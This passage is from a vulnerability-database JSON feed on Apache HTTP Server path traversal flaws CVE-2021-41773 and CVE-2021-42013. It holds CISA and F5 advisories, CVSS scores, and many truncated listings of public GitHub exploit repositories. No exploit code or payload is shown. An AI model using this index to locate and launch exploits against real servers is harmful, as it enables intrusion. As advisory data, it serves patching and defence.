"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "cisa", "title": "Apache Releases HTTP Server version 2.4.51 to Address Vulnerabilities Under Exploitation ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:76FE595B1B89D06301E16CB8087D39BD", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:21:13", "description": "_(Updated October 7, 2021)_\n\nApache has released additional fixes for CVE-2021-41773, which is tracked as [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). For more information see the [Apache vulnerabilities page](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>). \n\n_(Originally published October 6, 2021)_\n\nThe Apache Software Foundation has released Apache HTTP Server version 2.4.50 to address two vulnerabilities. An attacker could exploit these vulnerabilities to take control of an affected system. One vulnerability, [CVE-2021-41773](<https://www.cve.org/CVERecord?id=CVE-2021-41773>), has been exploited in the wild. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Apache HTTP Server 2.4.50 vulnerabilities page](<https://httpd.apache.org/>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:78B08801DAA7C3B8A2D34A5790730C76", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-02-10T00:00:00", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. ([CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>)) \n \nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. ([CVE-2021-42013](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T11:53:00", "type": "f5", "title": "Apache HTTP Server vulnerability CVE-2021-41773, CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T11:53:00", "id": "F5:K04082144", "href": "https://support.f5.com/csp/article/K04082144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. ([CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-05T06:12:00", "type": "f5", "title": "Apache HTTP server vulnerability CVE-2021-41524", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-11-05T06:12:00", "id": "F5:K56331254", "href": "https://support.f5.com/csp/article/K56331254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "githubexploit": [{"lastseen": "2022-03-04T01:18:36", "description": "# CVE-2021-41773\n\n## Usage\n\n```bash\ndocker-compose up --build vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-27T22:39:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-04T00:11:58", "id": "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773|CVE-2021-42013: Path Traversal Zero-Day in Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T14:58:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-07T19:19:39", "id": "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 and CVE-2021-42013 Lab Setup\n\n## Setup \n```\n$ g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-18T12:01:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-12-10T06:09:44", "id": "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T20:00:41", "description": " and 2.4.5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T17:56:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-27T21:52:34", "id": "0C28A0EC-7162-5D73-BEC9-B034F5392847", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T20:16:36", "description": "# CVE-2021-41773_CVE-2021-42013\nCVE-2021-41773 CVE-2021-42013\u591a\u7ebf\u7a0b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T03:32:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-30T12:49:14", "id": "B81BC21D-818E-5B33-96D7-062C14102874", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# cve-2021-41773 and cve-2021-42013\n\ncve-2021-41773 \u548c cve-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T11:33:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T06:48:47", "id": "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "Apache HTTP Server\n\n What is it?\n -----------\n\n The Apache HT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T22:02:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T12:52:18", "id": "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:32:50", "description": "# CVE-2021-42013\r\n\r\n## Description\r\n\r\nThis script exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T21:48:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-23T16:46:10", "id": "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:30", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:23", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# apache httpd path traversal checker\n\n\n## 0x00 \u6982\u8ff0\n\n20211005\uff0c\u7f51\u4e0a\u66dd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T10:38:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-31T07:15:01", "id": "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:27:46", "description": "## \u6f0f\u6d1e\u540d\u79f0\n\nApache \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c \uff08CVE-2021-42013\uff09\n\n## \u6f0f\u6d1e\u63cf\u8ff0\n\nApache HTTP Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T14:46:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-08T16:14:48", "id": "78787F63-0356-51EC-B32A-B9BD114431C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:15", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:28:59", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T04:08:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 